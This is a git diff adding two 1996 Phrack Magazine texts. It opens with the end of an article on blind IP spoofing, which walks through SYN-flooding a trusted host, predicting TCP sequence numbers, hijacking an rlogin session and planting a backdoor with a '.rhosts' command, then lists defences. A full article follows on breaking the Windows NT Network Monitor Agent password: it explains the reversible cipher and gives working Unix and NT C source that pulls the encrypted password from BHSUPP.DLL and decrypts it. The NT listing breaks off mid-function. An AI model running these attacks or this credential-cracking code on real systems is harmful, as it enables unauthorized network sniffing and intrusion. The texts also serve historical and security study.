+        --[ TCP Connection Establishment ]--
+
+
+        In order to exchange data using TCP, hosts must establish a
+a connection.  TCP establishes a connection in a 3 step process called
+the 3-way handshake.  If machine A is running an rlogin client and
+wishes to conect to an rlogin daemon on machine B, the process is as
+follows:
+
+                fig(1)
+
+1       A       ---SYN--->      B
+
+2       A    <---SYN/ACK---     B
+
+3       A       ---ACK--->      B
+
+
+At (1) the client is telling the server that it wants a connection.
+This is the SYN flag's only purpose.  The client is telling the
+server that the sequence number field is valid, and should be checked.
+The client will set the sequence number field in the TCP header to
+it's ISN (initial sequence number).  The server, upon receiving this
+segment (2) will respond with it's own ISN (therefore the SYN flag is
+on) and an ACKnowledgement of the clients first segment (which is the
+client's ISN+1).  The client then ACK's the server's ISN (3).  Now,
+data transfer may take place.
+
+
+        --[ The ISN and Sequence Number Incrementation ]--
+
+
+        It is important to understand how sequence numbers are
+initially choosen, and how they change with respect to time.  The
+initial sequence number when a host is bootstraped is initialized
+to 1. (TCP actually calls this variable 'tcp_iss' as it is the initial
+*send* sequence number.  The other sequence number variable,
+'tcp_irs' is the initial *receive* sequence number and is learned
+during the 3-way connection establishment.  We are not going to worry
+about the distinction.)  This practice is wrong, and is acknowledged
+as so in a comment the tcp_init() function where it appears.  The ISN
+is incremented by 128,000 every second, which causes the 32-bit ISN
+counter to wrap every 9.32 hours if no connections occur.  However,
+each time a connect() is issued, the counter is incremented by
+64,000.
+        One important reason behind this predictibility is to
+minimize the chance that data from an older stale incarnation
+(that is, from the same 4-tuple of the local and remote
+IP-addresses TCP ports) of the current connection could arrive
+and foul things up.  The concept of the 2MSL wait time applies
+here, but is beyond the scope of this paper.  If sequence
+numbers were choosen at random when a connection arrived, no
+guarantees could be made that the sequence numbers would be different
+from a previous incarnation.  If some data that was stuck in a
+routing loop somewhere finally freed itself and wandered into the new
+incarnation of it's old connection, it could really foul things up.
+
+
+        --[ Ports ]--
+
+
+        To grant simultaneous access to the TCP module, TCP provides
+a user interface called a port.  Ports are used by the kernel to
+identify network processes.  These are strictly transport layer
+entities (that is to say that IP could care less about them).
+Together with an IP address, a TCP port provides provides an endpoint
+for network communications.  In fact, at any given moment *all*
+Internet connections can be described by 4 numbers: the source IP
+address and source port and the destination IP address and destination
+port.  Servers are bound to 'well-known' ports so that they may be
+located on a standard port on different systems.  For example, the
+rlogin daemon sits on TCP port 513.
+
+
+                [SECTION II.  THE ATTACK]
+
+
+        ...The devil finds work for idle hands....
+
+
+        --[ Briefly... ]--
+
+
+        IP-spoofing consists of several steps, which I will
+briefly outline here, then explain in detail.  First, the target host
+is choosen.  Next, a pattern of trust is discovered, along with a
+trusted host.  The trusted host is then disabled, and the target's TCP
+sequence numbers are sampled.  The trusted host is impersonated, the
+sequence numbers guessed, and a connection attempt is made to a
+service that only requires address-based authentication.  If
+successful, the attacker executes a simple command to leave a
+backdoor.
+
+
+        --[ Needful Things ]--
+
+
+        There are a couple of things one needs to wage this attack:
+
+                (1) brain, mind, or other thinking device
+                (1) target host
+                (1) trusted host
+                (1) attacking host (with root access)
+                (1) IP-spoofing software
+
+Generally the attack is made from the root account on the attacking
+host against the root account on the target.  If the attacker is
+going to all this trouble, it would be stupid not to go for root.
+(Since root access is needed to wage the attack, this should not
+be an issue.)
+
+
+        --[ IP-Spoofing is a 'Blind Attack' ]--
+
+
+        One often overlooked, but critical factor in IP-spoofing
+is the fact that the attack is blind.  The attacker is going to be
+taking over the identity of a trusted host in order to subvert the
+security of the target host.  The trusted host is disabled using the
+method described below.  As far as the target knows, it is carrying on
+a conversation with a trusted pal.  In reality, the attacker is
+sitting off in some dark corner of the Internet, forging packets
+puportedly from this trusted host while it is locked up in a denial
+of service battle.  The IP datagrams sent with the forged IP-address
+reach the target fine (recall that IP is a connectionless-oriented
+protocol--  each datagram is sent without regard for the other end)
+but the datagrams the target sends back (destined for the trusted
+host) end up in the bit-bucket.  The attacker never sees them.  The
+intervening routers know where the datagrams are supposed to go.  They
+are supposed to go the trusted host.  As far as the network layer is
+concerned, this is where they originally came from, and this is where
+responses should go.  Of course once the datagrams are routed there,
+and the information is demultiplexed up the protocol stack, and
+reaches TCP, it is discarded (the trusted host's TCP cannot respond--
+see below).  So the attacker has to be smart and *know* what was sent,
+and *know* what reponse the server is looking for.  The attacker
+cannot see what the target host sends, but she can *predict* what it
+will send; that coupled with the knowledge of what it *will* send,
+allows the attacker to work around this blindness.
+
+
+        --[ Patterns of Trust ]--
+
+
+        After a target is choosen the attacker must determine the
+patterns of trust (for the sake of argument, we are going to assume
+the target host *does* in fact trust somebody.  If it didn't, the
+attack would end here).  Figuring out who a host trusts may or may
+not be easy.  A 'showmount -e' may show where filesystems are
+exported, and rpcinfo can give out valuable information as well.
+If enough background information is known about the host, it should
+not be too difficult.  If all else fails, trying neighboring IP
+addresses in a brute force effort may be a viable option.
+
+
+        --[ Trusted Host Disabling Using the Flood of Sins ]--
+
+
+        Once the trusted host is found, it must be disabled.  Since
+the attacker is going to impersonate it, she must make sure this host
+cannot receive any network traffic and foul things up.  There are
+many ways of doing this, the one I am going to discuss is TCP SYN
+flooding.
+        A TCP connection is initiated with a client issuing a
+request to a server with the SYN flag on in the TCP header.  Normally
+the server will issue a SYN/ACK back to the client identified by the
+32-bit source address in the IP header.  The client will then send an
+ACK to the server (as we saw in figure 1 above) and data transfer
+can commence.  There is an upper limit of how many concurrent SYN
+requests TCP can process for a given socket, however.  This limit
+is called the backlog, and it is the length of the queue where
+incoming (as yet incomplete) connections are kept.  This queue limit
+applies to both the number of imcomplete connections (the 3-way
+handshake is not complete) and the number of completed connections
+that have not been pulled from the queue by the application by way of
+the accept() system call.  If this backlog limit is reached, TCP will
+silently discard all incoming SYN requests until the pending
+connections can be dealt with.  Therein lies the attack.
+        The attacking host sends several SYN requests to the TCP port
+she desires disabled.  The attacking host also must make sure that
+the source IP-address is spoofed to be that of another, currently
+unreachable host (the target TCP will be sending it's response to
+this address.  (IP may inform TCP that the host is unreachable,
+but TCP considers these errors to be transient and leaves the
+resolution of them up to IP (reroute the packets, etc) effectively
+ignoring them.)  The IP-address must be unreachable because the
+attacker does not want any host to recieve the SYN/ACKs that will be
+coming from the target TCP (this would result in a RST being sent to
+the target TCP, which would foil our attack).  The process is as
+follows:
+
+                fig(2)
+
+1       Z(x)    ---SYN--->      B
+
+        Z(x)    ---SYN--->      B
+
+        Z(x)    ---SYN--->      B
+
+        Z(x)    ---SYN--->      B
+
+        Z(x)    ---SYN--->      B
+
+                ...
+
+2       X    <---SYN/ACK---     B
+
+        X    <---SYN/ACK---     B
+
+                ...
+
+3       X      <---RST---       B
+
+
+At (1) the attacking host sends a multitude of SYN requests to the
+target (remember the target in this phase of the attack is the
+trusted host) to fill it's backlog queue with pending connections.
+(2) The target responds with SYN/ACKs to what it believes is the
+source of the incoming SYNs.  During this time all further requests
+to this TCP port will be ignored.
+        Different TCP implementations have different backlog sizes.
+BSD generally has a backlog of 5 (Linux has a backlog of 6).  There
+is also a 'grace' margin of 3/2.  That is, TCP will allow up to
+backlog*3/2+1 connections.  This will allow a socket one connection
+even if it calls listen with a backlog of 0.
+
+        AuthNote: [For a much more in-depth treatment of TCP SYN
+flooding, see my definitive paper on the subject.  It covers the
+whole process in detail, in both theory, and practice.  There is
+robust working code, a statistical analysis, and a legnthy paper.
+Look for it in issue 49 of Phrack. -daemon9 6/96]
+
+
+        --[ Sequence Number Sampling and Prediction ]--
+
+
+        Now the attacker needs to get an idea of where in the 32-bit
+sequence number space the target's TCP is.  The attacker connects to
+a TCP port on the target (SMTP is a good choice) just prior to launching
+the attack and completes the three-way handshake.  The process is
+exactly the same as fig(1), except that the attacker will save the
+value of the ISN sent by the target host.  Often times, this process is
+repeated several times and the final ISN sent is stored.  The attacker
+needs to get an idea of what the RTT (round-trip time) from the target
+to her host is like.  (The process can be repeated several times, and an
+average of the RTT's is calculated.)  The RTT is necessary in being
+able to accuratly predict the next ISN.  The attacker has the baseline
+(the last ISN sent) and knows how the sequence numbers are incremented
+(128,000/second and 64,000 per connect) and now has a good idea of
+how long it will take an IP datagram to travel across the Internet to
+reach the target (approximately half the RTT, as most times the
+routes are symmetrical).  After the attacker has this information, she
+immediately proceeds to the next phase of the attack (if another TCP
+connection were to arrive on any port of the target before the
+attacker was able to continue the attack, the ISN predicted by the
+attacker would be off by 64,000 of what was predicted).
+        When the spoofed segment makes it's way to the target,
+several different things may happen depending on the accuracy of
+the attacker's prediction:
+- If the sequence number is EXACTly where the receiving TCP expects
+it to be, the incoming data will be placed on the next available
+position in the receive buffer.
+- If the sequence number is LESS than the expected value the data
+byte is considered a retransmission, and is discarded.
+- If the sequence number is GREATER than the expected value but
+still within the bounds of the receive window, the data byte is
+considered to be a future byte, and is held by TCP, pending the
+arrival of the other missing bytes.  If a segment arrives with a
+sequence number GREATER than the expected value and NOT within the
+bounds of the receive window the segment is dropped, and TCP will
+send a segment back with the *expected* sequence number.
+
+
+        --[ Subversion... ]--
+
+
+        Here is where the main thrust of the attack begins:
+
+                fig(3)
+
+1       Z(b)    ---SYN--->      A
+
+2       B     <---SYN/ACK---    A
+
+3       Z(b)    ---ACK--->      A
+
+4       Z(b)    ---PSH--->      A
+
+                [...]
+
+
+The attacking host spoofs her IP address to be that of the trusted
+host (which should still be in the death-throes of the D.O.S. attack)
+and sends it's connection request to port 513 on the target (1).  At
+(2), the target responds to the spoofed connection request with a
+SYN/ACK, which will make it's way to the trusted host (which, if it
+*could* process the incoming TCP segment, it would consider it an
+error, and immediately send a RST to the target).  If everything goes
+according to plan, the SYN/ACK will be dropped by the gagged trusted
+host.  After (1), the attacker must back off for a bit to give the
+target ample time to send the SYN/ACK (the attacker cannot see this
+segment).  Then, at (3) the attacker sends an ACK to the target with
+the predicted sequence number (plus one, because we're ACKing it).
+If the attacker is correct in her prediction, the target will accept
+the ACK.  The target is compromised and data transfer can
+commence (4).
+        Generally, after compromise, the attacker will insert a
+backdoor into the system that will allow a simpler way of intrusion.
+(Often a `cat + + >> ~/.rhosts` is done.  This is a good idea for
+several reasons: it is quick, allows for simple re-entry, and is not
+interactive.  Remember the attacker cannot see any traffic coming from
+the target, so any reponses are sent off into oblivion.)
+
+
+        --[ Why it Works ]--
+
+
+        IP-Spoofing works because trusted services only rely on
+network address based authentication.  Since IP is easily duped,
+address forgery is not difficult.  The hardest part of the attck is
+in the sequence number prediction, because that is where the guesswork
+comes into play.  Reduce unknowns and guesswork to a minimum, and
+the attack has a better chance of suceeding.  Even a machine that
+wraps all it's incoming TCP bound connections with Wietse Venema's TCP
+wrappers, is still vulnerable to the attack.  TCP wrappers rely on a
+hostname or an IP address for authentication...
+
+
+                [SECTION III. PREVENTITIVE MEASURES]
+
+
+        ...A stich in time, saves nine...
+
+
+        --[ Be Un-trusting and Un-trustworthy ]--
+
+
+        One easy solution to prevent this attack is not to rely
+on address-based authentication.  Disable all the r* commands,
+remove all .rhosts files and empty out the /etc/hosts.equiv file.
+This will force all users to use other means of remote access
+(telnet, ssh, skey, etc).
+
+
+        --[ Packet Filtering ]--
+
+
+        If your site has a direct connect to the Internet, you
+can use your router to help you out.  First make sure only hosts
+on your internal LAN can particpate in trust-relationships (no
+internal host should trust a host outside the LAN).  Then simply
+filter out *all* traffic from the outside (the Internet) that
+puports to come from the inside (the LAN).
+
+
+        --[ Cryptographic Methods ]--
+
+
+        An obvious method to deter IP-spoofing is to require
+all network traffic to be encrypted and/or authenticated.  While
+several solutions exist, it will be a while before such measures are
+deployed as defacto standards.
+
+
+        --[ Initial Sequence Number Randomizing ]--
+
+
+        Since the sequence numbers are not choosen randomly (or
+incremented randomly) this attack works.  Bellovin describes a
+fix for TCP that involves partitioning the sequence number space.
+Each connection would have it's own seperate sequence number space.
+The sequence numbers would still be incremented as before, however,
+there would be no obvious or implied relationship between the
+numbering in these spaces.  Suggested is the following formula:
+
+        ISN=M+F(localhost,localport,remotehost,remoteport)
+
+Where M is the 4 microsecond timer and F is a cryptographic hash.
+F must not be computable from the outside or the attacker could
+still guess sequence numbers.  Bellovin suggests F be a hash of
+the connection-id and a secret vector (a random number, or a host
+related secret combined with the machine's boot time).
+
+
+                [SECTION IV.  SOURCES]
+
+
+        -Books:         TCP/IP Illustrated vols. I, II & III
+        -RFCs:          793, 1825, 1948
+        -People:        Richard W. Stevens, and the users of the
+                        Information Nexus for proofreading
+        -Sourcecode:    rbone, mendax, SYNflood
+
+
+This paper made possible by a grant from the Guild Corporation.
diff --git a/phrack48/15.txt b/phrack48/15.txt
new file mode 100644
index 0000000..b3a212c
--- /dev/null
+++ b/phrack48/15.txt
@@ -0,0 +1,635 @@
+                      	   ==Phrack Magazine==
+
+             Volume Seven, Issue Forty-Eight, File 15 of 18
+
+
+		Windows NT Network Monitor Exploitation
+
+		         NetMon Encryption Hammer
+			
+   		    	  by the AON and Route 
+			   for Phrack Magazine
+		     May 1996 Guild productions, kid
+
+		     comments to daemon9@netcom.com
+
+	   Full exploit including binary dll's and execuatables:
+    ftp.infonexus.com/pub/TooldOfTheTrade/Windows/NT/netMonExploit.tgz 
+
+
+	[The intro]
+
+	The Microsoft Network Monitor is a packet sniffer that runs under NT.  
+It is a very robust and versatile packet sniffer, offering much more then
+simple ethernet frame capturing.  It packs a robust capture/display filter
+language, powerful protocol parsers, and one snappy GUI.  NetMon is 
+delivered as part of the SMS package.  The user portion of the program 
+calls upon the services of the Network Monitor Agent, which is a kernel driver
+that ships with NT (3.5.x for sure, but I don't know about 3.1).  The Network 
+Monitor Agent also provides an interface for a remote machine to connect and 
+capture local data, provided it passes authentication. To restrict access, 
+Network Monitor Agent utilizes a password authentication scheme.  Access has 
+two tiers: priviledge to view previously captured sessions, and priviledge to 
+actually use the sniffer to place the ethernet card in promiscuous mode.  The 
+acutal encrypted password is stored as a 32-byte binary string in a 
+dynamically linked library file called BHSUPP.DLL.  We have written code to 
+extract this password from the dll and decyrpt it; we have broken the 
+Microsoft Network Monitor password authentication system.
+
+
+	[The low-down]
+
+	The encrypted string is kept as binary data in: 
+%SystemRoot%\system32\BHSUPP.DLL (in a default installation at least). 
+BHSUPP.DLL is known to be different sizes between versions, so we cannot look 
+for the encrypted string at a specific offset each time.  Instead we must 
+search for a flag, and seek 32-bytes past this flag.  The flag is the 16-byte
+string: "RTSS&G--BEGIN--".  (As a matter of note, there is a terminating 
+footer also: "RTSS&G--END--".)
+
+
+	[The encrypted truth]
+
+	It is a simple encryption function, that takes random length string 
+and returns 256-bit encrypted output.  It may appear to be a hash, rather 
+than a block cipher, but it is not.  It does take a random length input,
+and produce a fixed output, but the input is always padded to 32-bytes
+(with nulls if necessary).  The input to the function is a user defined
+arbitrary string.  The input is truncated to 16 bytes and then to pad 
+out the array, the whole original password string is concatenated  on the 
+truncated version, starting at the 16th byte.  It doesn't matter if the
+resulting string is longer than 32 bytes, as the cipher ignores anything
+past the 32nd byte.  So: "loveKillsTheDemon" becomes: "loveKillsTheDemo" 
+and then: "loveKillsTheDemoloveKillsTheDemon".  If your password is  
+smaller than 16  bytes, we get the 'hole-in-password' phenomena.  Since 
+the array is intialized will nulls, and the password is still folded over to 
+the 16th byte, these nulls remain.  This is easily visible from the first line
+of output in our exploit code.  It also accepts empty password strings 
+readily, without choking, which all Microsoft products seem willing to do all 
+to easily.
+
+	[The algorithm]
+
+	The 32-byte string is put through 32 rounds of identical operations.
+The outer for loop controls the value of the byte to be XORed with the
+entire array that round (except for itself, see below).  The inner loop steps
+through the entire byte array.  Each byte is permuted a total of 31 times 
+(The discrepency comes from the test case where i must not be equal to j in 
+order for a character to be permuted.  It would make no sense to XOR a byte 
+with itself).  So, there are a total of 992 operations.  The actual 
+encryption algorithm is quite simple:
+
+In C:			if(i!=j)mix[j]^=mix[i]+(i^j)+j;
+
+In English:		if i is NOT equal to j, the j indexed char of mix is 
+			assigned the value of the j indexed char of mix XORed 
+			with the i indexed char of mix PLUS i XORed with j 
+			PLUS j.
+
+Mathematically:		1) i ^ j = k
+			2) k + j = l
+			3) l + mix[i] = m
+			4) m ^ mix[j] = x
+
+			OR
+
+			((i ^ j) + j + mix[i]) ^ mix[j] = x 
+
+
+	The methods used for obscurity are exclusive OR (XOR) and binary 
+addition, (see the appendix if you are umfamiliar with these bitwise 
+operations) with completely known vectors.  The only unknown in the whole 
+equation is the user entered password, fleshed out to 32-bytes.  These 32
+bytes are taken through 32 rounds of permutations.  Simple and concise, 
+with no key material dropped, this algorithm is not lossy.  Since it is not 
+lossy it is 100% reversible, both in theory and practice.  In fact, since we 
+know the values of the counters i and j, throughout the entire encryption 
+process, decryption is simply a matter of reproducing these values in the 
+proper order.  Since the output of the encryption process is the input, 
+taken through 32 rounds of identical permutations, with known vectors, 
+we simply need to reverse this process.
+
+	[The code]
+
+	There are two versions of the exploit available.  A Windows NT version
+and, for those of you without access to an expensive NT-native compiler, 
+there is a Unix version as well.  The NT version is a console-based app, as
+GUI code would be a waste of time.  The full package of this exploit, along
+with an NT exexcutable and sample DLL's is available from:
+    ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz 
+
+
+	[The discussion]
+
+	The ramifications of this weak encryption in Network Monitor Agent are 
+many.  First off, the developers of Network Monitor Agent *didn't* use the 
+standard security mechanisms of Windows NT.  This may be because the driver is
+a kernel mode driver, and in NT the kernel is a trusted enity, therefore 
+the standard security API (of Win32) does not apply in the kernel making it 
+harder to do user authentication.  It also appears that they were trying to 
+achieve a mechanism based not on priviledge, but on knowledge.  It is very 
+likely that in secured environment not all administrators should be able to 
+sniff the network.  The problem is they did a *poor* job of securing a 
+powerful utility.
+	The most straight forward attack is use Network Monitor to sniff the 
+network (where you weren't suppose to be able to) for priviledged user data or
+passwords in a heterogeneous environment (since native NT networking does not 
+send password information in the clear, but standard TCP traffic from Unix
+is sent clear).  The rest of the attacks would come from shabby administration
+, such as the administrator used the password for the admin account and the 
+capture password in Network Monitor Agent (stupid, but likely) or the 
+same password for Network Monitor Agent on all machines across the network.
+	In order to use the exploit utility, one must have read priviledge for 
+BHSUPP.DLL which is installed into %SystemRoot%\system32 by default.  This 
+is not a remote attack, but rather a stepping stone to gain priviledged 
+information when one is under-priviledged.
+
+	[The moral]
+
+	Time and time again we see either shody implementations of trusted
+algorithms, or, like in this case, just plain bad cryptography.  Under ITAR,
+most secure cryptographic algorithms are classified as munitions, and are not
+exportable from this country.  The funny thing is, under current law, one-way
+hashing functions are *not* restricted (that is why all Unix variants can ship
+with the standard crypt(3) libraries and executables).  This authentication
+scheme could have *easily* been replaced by MD5, the same one-way hash used
+by PGP.  At least then, the complexity of an attack would be increased to
+a brute-force known-plaintext sweep of key values...
+
+
+
+	[The appendix]
+
+	For the binary-declined...
+
+Exclusive OR
+
+The XOR operation is a bitwise operation with the following truth table:
+
+	XOR| 1 | 0 |		The Exclusive OR operation simply says:
+	-------------		"...Hmmm, if I have a 1 and a 0, I'll spit
+	1  | 0 | 1 | 		out a 1.  Anything else, a 0..."
+	-------------
+	0  | 1 | 0 |
+
+
+Binary addition
+
+Binary addition is analogous to base10 addition.  However, each place holds
+2^n instead of 10^n...
+
+	add| 1 | 0 | 		base10:		base2:
+	-------------		    11            1011
+	1  |1 0| 1 | 		   + 5          + 0101
+	-------------              ---          ------
+	0  | 1 | 0 |                16		 10000
+
+
+
+
+This exploit made possbile by a grant from the Guild corporation.
+
+- May 07, 1996 route/aon
+
+
+	[The Sourcecode]
+	[Unix Version]
+
+/*
+
+Network Monitor Exploitation code, Unix version
+coded by daemon9
+The Guild, 1996
+
+*/
+
+
+#include<string.h>
+#include<stdio.h>
+#include<fcntl.h>
+
+#define fbufsize 	8192
+#define flag 		"RTSS&G--BEGIN--"
+#define VERSION		"Unix version\n"
+#define BUFSIZE 	48
+#define DLLNAME 	"./BHSUPP.DLL"
+
+int main()
+{
+	char *swirl(char *,int);
+	char *recover(char *);
+	void hexonx(char *);
+
+	char werd[]={"\n\n\n\n.this code made possible by a grant from the Guild corporation.\n\0"};
+	char *plain,*tmp,*fname,*encrypted;
+	int c;
+
+	printf(werd);
+	printf("\nNetMon Password Decryption Engine ");
+	printf(VERSION);
+	printf("\t1.\t\tEncrypt a plaintext password from STDIN.\n");
+	printf("\t2.\t\tDecrypt a plaintext password from the dll.\n");
+	tmp=(char *)malloc(10); 	/* Can't switch getchar() as it locks the */
+	bzero(tmp,10); 			/* fucking stream and makes futher I/O buggy*/
+	switch(atoi(gets(tmp))){
+		case 1:
+			printf("Enter password to be encrypted (note echo is on, as it would be a moot point\nto turn it off)\n->");
+			plain=(char *)malloc(BUFSIZE);
+			bzero(plain,sizeof(BUFSIZE)); 
+			gets(plain); 
+			hexonx(swirl(plain,0));
+			break;
+		case 2:
+			printf("Enter name and path of DLL [./BHSUPP.DLL]:");
+			fname=(char *)malloc(BUFSIZE);
+			bzero(fname,sizeof(BUFSIZE));
+			gets(fname);
+			if(fname[0]==0)strcpy(fname,DLLNAME);
+			if(!(encrypted=recover(fname))){
+				printf("Could not locate flag\n");
+				exit(1);
+			}
+			hexonx(swirl(encrypted,1));			
+			break;
+		default:
+			printf("\nFine.\n");
+			exit(0);
+	}
+	return 0;	
+}
+
+/*
+swirl is the encryption/decryption function.  It takes an arbitrary length
+string and, depending on the value of the mode variable, encrypts it or
+decrypts it.  It returns a pointer to the string.
+*/
+
+char *swirl(byteStr,mode)
+char *byteStr;
+int mode;
+{
+	int i=0,j=0;
+	char *mix,roundAndround[32][32];
+	void hexonx(char *);
+
+	mix=(char *)malloc(sizeof(byteStr));
+
+
+	if(!mode){
+		memset(mix,0,32);			/* set 32 bytes of memory to 0 */
+		strncpy(mix,byteStr,16);          	/* copy the first 16 bytes of the password into the mix*/
+		memcpy(&mix[16],byteStr,strlen(byteStr));   /* copy password into the 16th char of the mix; if mix and plain overlap, problems occur */
+
+		printf("Password upon entering encryption rounds:\n");
+		hexonx(mix);
+		printf("\n\nbeginning 32 rounds of 'encryption'\n");
+		for(i=0;i<32;i++)for(j=0;j<32;j++)if(i!=j){
+			mix[j]^=mix[i]+(i^j)+j;			/* Sekret Enkripsion occurs here... */
+			memcpy(&roundAndround[i][0],mix,32);	/* save a copy of each round */
+						  }
+		printf("\nDo you wish to view the encryption process round by round?[y]");
+		switch(toupper(getchar())){
+			case 'N':
+				break;
+			case 'Y':
+			default:
+			for(i=0;i<32;i++){
+				printf("round %d:\n",i+1);     	/* print the rounds out in hex */
+				hexonx(&roundAndround[i][0]);
+				getc(stdin);
+			}
+		}
+		printf("\nEncrypted output:\n");
+		return(mix);
+	}
+	if(mode){
+		strncpy(mix,byteStr,32);
+		for(i=31;i>=0;i--)for(j=31;j>=0;j--)if(i!=j)mix[j]^=mix[i]+(i^j)+j;
+		mix[32]=0;		
+		printf("\n\n\nThe plaintext is: %s\nIn hex:\n",mix);
+		return(mix);
+	}
+}
+
+/* 
+hexonx simply prints out 32 bytes of hexidecimal characters.
+*/
+
+void hexonx(byteStr)
+char *byteStr;
+{
+	int i=0;
+	for(;i<32;i++)printf("0x%x ",byteStr[i]);
+	printf("\n");
+}
+
+
+/*
+recover attempts to read the encrypted string from the dll 
+*/
+
+char *recover(fname)
+char *fname;
+{
+
+	char buffer[fbufsize],*pass;
+	int fd,i=0,j=0,demonFlag=0,offset,bufOffset=0;
+
+	if((fd=open(fname,O_RDONLY))<=0){
+		fprintf(stderr,"Cannot open %s\n",fname);
+		exit(1);
+	}
+	while(read(fd,buffer,8192)){
+		i=0;
+		while(i<fbufsize&&!demonFlag){
+				switch(buffer[i-4]){
+					case 'R':
+						if(buffer[i-3]=='T'&&buffer[i-2]=='S'&&buffer[i-1]=='S'&&buffer[i+1]=='G'&&buffer[i+2]=='-'&&buffer[i+3]=='-'&&buffer[i+4]=='B'&&buffer[i+5]=='E'&&buffer[i+6]=='G'&&buffer[i+7]=='I'&&buffer[i+8]=='N'&&buffer[i+9]=='-'&&buffer[i+10]=='-'){
+							demonFlag++;
+							bufOffset=i;
+	/* Password is 32 bytes past end of header */	offset=j-4;
+							printf("Encrypted Token Flag: '%s' located at offset 0x%x\n",flag,offset);
+							printf("Encrypted password should be located at offset 0x%x\n",offset+48);
+						}
+						break;
+					default:
+				}
+		i++;
+		j++;
+		}		
+	if(demonFlag)break;
+	}
+	if(!offset)return(0);
+	pass=(char *)malloc(BUFSIZE);
+	bzero(pass,32);
+	memcpy(pass,&buffer[bufOffset-4+48],32);
+	
+	printf("\nDo you wish to view the encrypted password?[y]");
+		switch(toupper(getchar())){
+			case 'N':
+				break;
+			case 'Y':
+			default:
+				hexonx(pass);
+				getc(stdin);
+		}
+	return(pass);
+}
+
+
+	[The Sourcecode]
+	[NT Version]
+
+
+
+//	A Guild Production  1996  //
+//	Constructed by AON  //
+
+#define STRICT
+#define MAX_FILE_SIZE 24576						//if BHSUPP.DLL grows, so must this
+			
+#include <windows.h>
+#include <stdio.h>
+
+void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword);
+BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword);
+void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile);
+
+HANDLE g_hStdIn, g_hStdOut;						//global declaration of StandardIN and OUT
+
+
+//	This is a console app.  ReadFile and WriteFile used throughout so StdIN and StdOUT
+//  can be redirected.
+
+void main(int argc, char* argv[])			
+{
+	HANDLE hTargetFile;						
+	BYTE lpEncryptedPassword[32];		
+	char lpszPlaintextPassword[17] = {0};
+	char lpszOutputBuffer[80];
+	char lpszTargetFile[MAX_PATH] = {0};
+	char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename]\n";
+	LPTSTR lpszSystemDirectory = NULL;
+	UINT nCount, nCount2;
+	
+	//set global handles
+	
+	g_hStdIn = GetStdHandle(STD_INPUT_HANDLE);	
+	g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);
+
+	//check for standard NT help switch
+	
+	if(argc > 1 && argv[1][0] == '/' && argv[1][1] == '?')
+	{
+		//display usage info
+		
+		WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL);
+			
+		//exit with success
+		
+		ExitProcess(0L);
+	}
+	
+	//if path and file name not specified on commandline try system directory first, because
+	//BHSUPP.DLL is probably there
+	if(argc == 1)
+	{
+		//findout how long path is for mem alloc
+		nCount = GetSystemDirectory(lpszSystemDirectory, 0);	
+															
+		//do alloc of that size
+		lpszSystemDirectory = malloc(nCount);		
+	
+		if(lpszSystemDirectory == NULL)
+		{
+			WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
+					  41, &nCount, NULL);
+
+			ExitProcess(1L);
+		}
+
+		//get system dir
+		GetSystemDirectory(lpszSystemDirectory, nCount);		
+	
+		//append file name to system directory
+		sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory);
+		
+		//release memory
+		free(lpszSystemDirectory);
+	}
+	
+	else
+	{
+		//get the commandline input
+		strcpy(lpszTargetFile, argv[1]);
+	}
+
+	//try to open BHSUPP.DLL in the system dir or where the user instructed
+	hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
+							 FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
+							 FILE_FLAG_SEQUENTIAL_SCAN, NULL);
+
+	//if not on the commandline or in the system dir ask user for path
+	if(hTargetFile == INVALID_HANDLE_VALUE && argc == 1)
+	{
+		GetTargetFileFromUser(&hTargetFile, lpszTargetFile);
+	}
+	
+	//user gave bad path or they don't have read permission on the file
+	else if(hTargetFile == INVALID_HANDLE_VALUE)
+	{
+		//make error string because file open failed
+		nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile);
+
+		//write out
+		WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
+	
+		//exit with failure
+		ExitProcess(1L);
+	}
+
+	//retrieve the encrypted password from BHSUPP.DLL
+	if(!GetEncryptedPassword(hTargetFile, lpEncryptedPassword))
+	{
+		WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n",
+				  39, &nCount, NULL);
+
+		ExitProcess(1L);
+	}
+
+	//cleanup handle
+	CloseHandle(hTargetFile);
+
+	//do the decryption here
+	DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword);
+
+	//prepare for and print out results
+	nCount2 = sprintf(lpszOutputBuffer, 
+					  "\nThe Network Monitor Agent capture password is %s\n",
+					  lpszPlaintextPassword);
+
+	WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
+
+	//close StandardIN and StandardOUT handles
+	CloseHandle(g_hStdIn);
+
+	CloseHandle(g_hStdOut);
+
+	//exit with success
+	ExitProcess(0L);
+}
+
+
+//Ah yeah, here it is.
+void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword)
+{
+    register int outer, inner;
+
+    //go backwards through loops to undo XOR
+	for ( outer = 31; outer >= 0; outer-- )
+    {
+        for ( inner = 31; inner >= 0; inner-- )
+        {
+            if ( outer != inner )
+            {
+				lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] + 
+											  (outer ^ inner) + inner;
+            }
+        }
+    }
+
+    //since the original password was folded to fill 32 bytes only copy the first 16 bytes
+	memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16);
+
+	//zero terminate this baby just incase it is actually a 16 byte password (yeah, right!)
+	lpszPlaintextPassword[16] = 0L;
+
+	return;
+}
+
+
+//	get the path and file name for BHSUPP.DLL from the user in the case that it was
+//  a custom install
+void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile)
+{
+	char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: ";
+	UINT nCount;
+
